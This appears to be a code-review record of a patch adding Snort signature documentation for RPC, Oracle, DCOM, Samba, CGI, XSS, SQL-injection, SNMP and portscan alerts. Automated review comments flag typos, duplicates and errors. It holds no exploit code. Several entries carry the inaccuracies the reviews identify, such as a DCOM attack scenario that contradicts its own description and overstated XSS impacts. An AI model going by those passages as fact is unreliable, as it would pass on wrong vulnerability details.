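Review bot: the sentence naming the vulnerable procedure is broken across lines in Detailed Information: "vulnerability in the procedure drop_priority_raw" is followed by a line beginning ". This procedure is included in", so the rendered text reads "drop_priority_raw" with a stray newline before the period; join it into "...in the procedure drop_priority_raw. This procedure is included in sys.dbms_repcat_conf." Also "Oracle Oracle9i" under Affected Systems repeats the vendor name, the headings "Rule: ", "Sid: " and several "-- " separators carry trailing whitespace that the other files in this patch do not, "Apply the appropriate vendor supplied patch" lacks its period, and Additional References is empty; cite the vendor alert the rule is based on.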
--- /dev/null
+++ b/doc/signatures/1949.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+1949
+
+--
+Summary:
+This event is generated when an attempt is made to register a Remote Procedure Call (RPC) program to the portmapper.  RPC is a facility that enables a machine to request a service from another remote machine. This is done without the need for detailed network information. Some versions of RPC have a vulnerability that allows a remote host to register applications from a spoofed source. 
+
+ -- 
+Impact:
+Attempted remote access.  This may be an attempt to maliciously register a program with the portmapper.
+
+--
+Detailed Information:
+Certain versions of rpcbind portmapper contain a flaw that can allow an attacker capable of spoofing TCP packets to register arbitrary RPC programs. It is possible for the attacker to gain root access depending on the RPC service registered.  
+
+-- 
+Affected Systems: 
+All machines running vulnerable RPC services.
+
+--
+Attack Scenarios:
+The attacker could potentially spoof TCP packets using pmap_set to register an RPC service. 
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule writer Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+
+--
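Review bot: this file has no "Additional References" section at all (it ends after Contributors with a bare "--"), which breaks the fixed section layout every other file in the patch follows; add the heading even if the body is "None". The separator after the Summary is written " -- " with a leading space, unlike the "--" used everywhere else. "Affected Systems: All machines running vulnerable RPC services." is vaguer than the Detailed Information, which pins the flaw to "Certain versions of rpcbind portmapper"; name the affected rpcbind versions, or at least say "Hosts running an affected rpcbind/portmapper".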
--- /dev/null
+++ b/doc/signatures/616.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+616
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain 
+which ports a host may be listening on, whether or not the ports are 
+filtered by a firewall and if the host is vulnerable to a particular 
+exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. 
+Then the attacker might find out that the FTP service is vulnerable to a
+particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other 
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
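Review bot: neither the Summary ("This event is generated when a scan is detected.") nor the Detailed Information says which scan this rule matches (tool, flag combination or payload it keys on), so an analyst cannot distinguish this sid from the other scan rules or weigh the False Positives note "A scanner may be used in a security audit."; state the specific scan signature the rule detects. The Additional References section is also empty.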
--- /dev/null
+++ b/doc/signatures/1702.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1702
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
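Review bot: nothing in this file identifies the CGI application or script the rule matches: the Summary says only "a known vulnerability in a CGI web application" and Affected Systems says "All systems running CGI applications", which is the same generic text as 1556.txt later in this patch; name the script and parameter the rule keys on so the Detailed Information is not interchangeable with every other CGI rule. Also fix "running ona web server" (missing space) and "attackers choosing" (apostrophe), and fill in Additional References, which is empty.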
--- /dev/null
+++ b/doc/signatures/1792.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+1792
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Mnews.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A buffer overflow condition exists in Mnews, an NNTP and mail client.
+The overflow can be caused by a server sending enough data with a 200
+response to overwrite stack memory and so present the attacker with the
+oppotunity to execute code of their choosing.
+
+--
+Affected Systems:
+	FreeBSD 4.1
+	FreeBSD 4.2
+	FreeBSD 4.3
+	FreeBSD 4.4
+	FreeBSD 4.5
+
+--
+Attack Scenarios:
+The attacker needs to send enough extra data with the 200 response from
+a server to cause the overflow.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0909
+
+Bugtraq:
+http://www.securityfocus.com/bid/4900
+
+--
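Review bot: typo in Detailed Information: "oppotunity" should be "opportunity". Affected Systems lists FreeBSD 4.1 through 4.5, but the vulnerability described is in the Mnews client, not in the operating system, so the section should name the affected Mnews versions (the referenced Bugtraq 4900 entry is the place to take them from) and, if the FreeBSD releases are kept, say they are listed because their ports shipped a vulnerable Mnews. "None known" under False Positives and False Negatives is missing its period, and "Rule:  " has trailing whitespace.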
--- /dev/null
+++ b/doc/signatures/3225.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3225
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
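Review bot: the Attack Scenarios text ("An attacker may make a request for a file with an overly long filename via a network share.") does not match the Detailed Information, which describes "sending malformed data via RPC" to an RPC port; reword one of the two so the reader knows whether the rule inspects RPC traffic or SMB file requests. Also "Expoit code exists" should be "Exploit code exists", and Additional References is empty for a vulnerability that has a vendor bulletin; cite it. Note that this file is word for word the same as 3418.txt later in the patch, so whatever distinguishes the two rules should be documented in both.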
--- /dev/null
+++ b/doc/signatures/552.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+552
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This may be against corporate policy. p2p clients connect to other p2p clients to share files, commonly music and video files but can be configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to transfer company confidential information to unauthorized hosts external to the protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using a p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+
+--
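Review bot: the Summary speaks of "activity by Peer-to-Peer (p2p) clients" in general, but the only reference is the OpenNap specification, so the rule presumably keys on Napster/OpenNap protocol traffic; say so in the Summary and Detailed Information, otherwise an analyst will expect this sid to cover every p2p protocol. "Ease of Attack: Simple." and "Attack Scenarios: This is indicative of the use of a p2p client." are filler for what the Impact section itself calls an informational event; "Not applicable" would be more accurate in both.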
--- /dev/null
+++ b/doc/signatures/2851.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2851
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_snapshot_repobject
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
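Review bot: same line-break defect as 2893.txt: "vulnerability in the procedure create_snapshot_repobject" is followed by a line starting ". This procedure is included in", leaving a stray newline before the period; join it into "...in the procedure create_snapshot_repobject. This procedure is included in dbms_repcat." Also "Oracle Oracle9i" repeats the vendor name, the package is given here as "dbms_repcat" while 2893.txt uses the schema-qualified "sys.dbms_repcat_conf" (pick one convention for the series), the "Rule: ", "Sid: " and "-- " lines carry trailing whitespace, "Apply the appropriate vendor supplied patch" lacks its period, and Additional References is empty.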
--- /dev/null
+++ b/doc/signatures/1556.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1556
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
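Review bot: this file is identical to 1702.txt in this patch apart from the Sid, so neither documents what its rule actually detects; the Summary ("a known vulnerability in a CGI web application") and Affected Systems ("All systems running CGI applications") need the script name and parameter the rule keys on. The same typos are carried over: "running ona web server" is missing a space and "attackers choosing" needs an apostrophe, and Additional References is empty.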
--- /dev/null
+++ b/doc/signatures/1754.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1754
+
+--
+Summary:
+This event is generated when an attempt is made to access the as_web4.exe component associated with the askSam Web Publisher software.
+
+--
+Impact:
+Cross-site scripting.  This may allow execution of arbitrary commands on a victim host that visits the vulnerable server.
+
+--
+Detailed Information:
+
+askSam Web Publisher is a product that allows the creation and publication of documents and databases on the Internet.  A vulnerability exists in the as_web.exe or as_web4.exe component that may allow cross-site scripting because of a failure to filter script and HTML when error messages are returned.  This may allow an attacker to execute arbitrary code on the victim host that visits the vulnerable server.
+
+--
+Affected Systems:
+askSam Web Publisher 4.0
+
+--
+Attack Scenarios:
+An attacker can inject malicious code in vulnerable askSam input fields that use as_web.exe or as_web4.exe. The may allow execution of arbitrary code on a victim host that visits the vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+This alert will trigger on any access to the as_web4.exe module.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable scripting language support in your browser and e-mail client software to prevent becoming a victim host.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/4670
+
+--
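Review bot: the Impact ("execution of arbitrary commands on a victim host") and Attack Scenarios ("execution of arbitrary code on a victim host") overstate a cross-site scripting flaw: what the attacker gains is script execution in the victim's browser in the context of the vulnerable site, not command execution on the host, and both sections should be reworded around that. Corrective Action only tells the client to disable scripting; the server-side fix (vendor patch, or filtering script and HTML from the error messages that Detailed Information itself identifies as the root cause) belongs there too. Typo in Attack Scenarios: "The may allow execution" should be "This may allow execution"; and the blank line after "Detailed Information:" is inconsistent with the other files.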
--- /dev/null
+++ b/doc/signatures/3022.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3022
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
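Review bot: missing space in Detailed Information: "the remote server.The problem" should be "the remote server. The problem"; and "heterogenous" should be "heterogeneous". The Detailed Information describes an integer overflow in memory allocation, while Attack Scenarios describes overflowing "a buffer containing the information for the access control lists"; state explicitly whether these are one flaw (the ACL data driving the allocation) so the two sections do not read as different bugs. Additional References is empty; cite the Samba advisory covering "Samba 3.0.8 and prior".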
--- /dev/null
+++ b/doc/signatures/1419.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+1419
+
+--
+
+Summary:
+This event is generated when an SNMP-Trap connection over UDP to an SNMP
+daemon is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+The SNMP (Simple Network Management Protocol) Trap daemon usually 
+listens on port 162, tcp or udp.
+
+An attacker may attempt to send this request to determine if a device is
+using SNMP.
+
+--
+
+Affected Systems:
+Devices running SNMP daemons on well known ports.
+
+--
+
+Attack Scenarios:
+An attacker sends a packet directed to udp port 162, if sucessful a 
+reply is generated and the attacker may then launch further attacks 
+against the SNMP daemon.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Use a packet filtering firewall to protect devices using the SNMP 
+protocol and only allow connections from well-known hosts.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+
+
+--
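Review bot: typo and comma splice in Attack Scenarios: "An attacker sends a packet directed to udp port 162, if sucessful a reply is generated" should read "An attacker sends a packet to UDP port 162; if successful, a reply is generated". "Impact: Information gathering" is missing its period. Detailed Information says the trap daemon "listens on port 162, tcp or udp" while the Summary restricts the rule to "an SNMP-Trap connection over UDP"; say explicitly that this rule covers the UDP case only so the reader does not expect it to fire on TCP.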
--- /dev/null
+++ b/doc/signatures/3418.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3418
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
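Review bot: this file duplicates 3225.txt in this patch verbatim, so it inherits the same problems: Attack Scenarios ("a request for a file with an overly long filename via a network share") contradicts the Detailed Information's "sending malformed data via RPC", "Expoit code exists" should be "Exploit code exists", and Additional References is empty. More importantly, nothing here says how sid 3418 differs from sid 3225 (protocol, port or content matched); one sentence in the Summary or Detailed Information should state that difference.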
--- /dev/null
+++ b/doc/signatures/100000834.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000834
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Lazarus" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "show" parameter in the "codes-english.php" script used by the "Lazarus" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Lazarus
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
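Review bot: the Impact section ("Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing") is the generic CGI boilerplate and overstates a reflected cross-site scripting issue; the Attack Scenarios line "steal information from a user clicking on that link" is the accurate description, so reword Impact around credential or session theft in the user's browser. Also the "--" separator directly follows the Sid, Affected Systems and Contributors lines without the blank line every other section uses, and "attackers choosing" needs an apostrophe.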
--- /dev/null
+++ b/doc/signatures/2030.txt
@@ -0,0 +1,88 @@
+Rule:
+
+--
+Sid:
+2030
+
+--
+Summary:
+A user can change their password for Network Information Services (NIS) 
+using the ypasswd command. A vulnerability exists in ypasswd where
+an overly long username can cause a buffer overflow resulting in 
+unauthorized access to the remote machine.
+
+--
+Impact:
+Unauthorized super user access to the vulnerable host resulting in a 
+compromise of all data on the host and any network resources that host 
+is connected to. Full control of the victim is gained.
+
+--
+Detailed Information:
+The rpc.ypasswd service processes all password changes from 
+ypasswd. Supplying a specially crafted request to a NIS server 
+running this daemon in the form of a long username, the attacker can 
+cause a buffer overflow in that process.
+
+Since all master servers handling NIS resources run this daemon, the 
+resulting root access affects all NIS resources available on the LAN.
+
+An exploit for this vulnerability exists, hosts that have been 
+compromised using this vulnerability typically display two instances of 
+inetd running at the same time. The result of the exploit is a root 
+shell attached to port 77 of the host.
+
+--
+Affected Systems:
+	Caldera OpenServer 5.0.5
+	Caldera OpenServer 5.0.6
+	Solaris 2.6
+	Solaris 7
+	Solaris 8
+
+--
+Attack Scenarios:
+The attacker needs to craft a specially formulated request to the 
+rpc.ypasswd service containing a long username. An exploit for this 
+vulnerability exists.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply pacthes for the affected systems as soon as possible.
+
+Disable the rpc.ypasswd daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CIAC:
+http://www.ciac.org/ciac/bulletins/m-008.shtml
+
+Security Focus Mailing List Archive:
+http://www.securityfocus.com/archive/1/187086
+
+CERT:
+http://www.kb.cert.org/vuls/id/327281
+
+--
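Review bot: the service and command are spelled "ypasswd" and "rpc.ypasswd" throughout; the NIS password client and daemon are conventionally yppasswd and rpc.yppasswdd (double p), so check the spelling against the referenced CIAC bulletin before this ships. The Summary describes the vulnerability instead of saying when the event is generated, unlike every other file in this patch; its first sentence should be "This event is generated when an attempt is made to ...". Typo in Corrective Action: "Apply pacthes" should be "Apply patches".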
--- /dev/null
+++ b/doc/signatures/122-18.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-18
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a udp decoy
+portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
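Review bot: typos in Impact and Detailed Information: "reconnaisance" should be "reconnaissance" and "consititute" should be "constitute". "the prelude to a targeted attack against the targeted systems" repeats "targeted"; "against the scanned systems" reads better. In Corrective Action, "Apply any appropriate vendor supplied patches as appropriate." says "appropriate" twice; "Apply any applicable vendor supplied patches." is enough.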
--- /dev/null
+++ b/doc/signatures/396.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+396
+
+--
+
+Summary:
+This event is generated when an ICMP Destination Unreachable Fragmentation Needed datagram is detected on the network.  Gateway devices normally generate these ICMP messages when the destination network requires fragmentation before the datagram can be forwarded by a gateway.
+
+--
+
+Impact:
+This ICMP message will be generated when the destination network specified in the datagram requires fragmentation and the DF bit is set on the datagram.  This could be an indication of improperly configured network hosts.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
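Review bot: this file has no "Affected Systems" section, which every other signature file in the patch carries between Detailed Information and Attack Scenarios; add it ("Any host" or "Not applicable"). Grammar in Detailed Information: "could indication routing problems" should be "could indicate routing problems". "This rule detects informational network information" in Corrective Action is circular; "This rule reports informational events about the network" would do.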
--- /dev/null
+++ b/doc/signatures/100000856.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000856
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Professional Home Page Tools" application running on a webserver. Access to the file "class.php" with SQL commands being passed as the "mail" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "mail" parameter in the "class.php" script used by the "Professional Home Page Tools" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
